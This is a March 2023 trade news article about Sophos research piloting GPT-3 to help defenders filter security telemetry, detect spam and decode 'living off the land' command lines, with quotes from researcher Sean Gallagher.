Sophos explores using ChatGPT to tackle cyberthreats


By Dylan Bushell-Embling
Wednesday, 22 March, 2023

Sophos explores using ChatGPT to tackle cyberthreats

Cybersecurity company Sophos has released new research demonstrating how the generative AI technology behind ChatGPT can be used to fight cybercrime.

The research details pilot projects developed using the GPT-3 large language models to simplify the search for malicious activity in data from security software, more accurately filter spam and speed up analysis of “living off the land” attacks.

For example, the GPT-3 AI model can be developed to filter malicious activity in XDR Telemetry datasets, Sophos found. The company tested the model against its endpoint detection and response product to allow defenders to filter the data with basic English commands.

Sophos researchers were also able to adapt the technology to simplify the process for reverse-engineering the command lines of living off the land technologies known aS LOLBins, a process notoriously difficult to pull off.

Sophos Principal Threat Researcher Sean Gallagher said the research demonstrates that generative AI can be used by both sides of the security fence.

“Since OpenAI unveiled ChatGPT back in November, the security community has largely focused on the potential risks this new technology could bring,” he said.

“Can the AI help wannabee attackers write malware or help cybercriminals write much more convincing phishing emails? Perhaps, but, at Sophos, we’ve long seen AI as an ally rather than an enemy for defenders, making it a cornerstone technology for Sophos, and GPT-3 is no different.”

He said the findings demonstrate that the security community should be paying attention not just to the potential risks, but the potential opportunities GPT-3 brings.

“We are already working on incorporating some of the prototypes above into our products, and we’ve made the results of our efforts available on our GitHub for those interested in testing GPT-3 in their own analysis environments,” Gallagher said.

“In the future, we believe that GPT-3 may very well become a standard co-pilot for security experts.”

Image credit: iStock.com/marchmeena29

Related News

ISACA identifies gaps in AI knowledge, training and policies

85% of digital trust professionals say they will need to increase their AI skills and knowledge...

VNC accounts for nearly all remote desktop attacks

Virtual Network Computing accounted for 98% of remote desktop attacks recorded by Barracuda last...

Vectra AI expands platform to combat GenAI threats

Vectra AI has announced new enhancements to its AI-driven platform aimed at protecting businesses...


  • All content Copyright © 2024 Westwick-Farrow Pty Ltd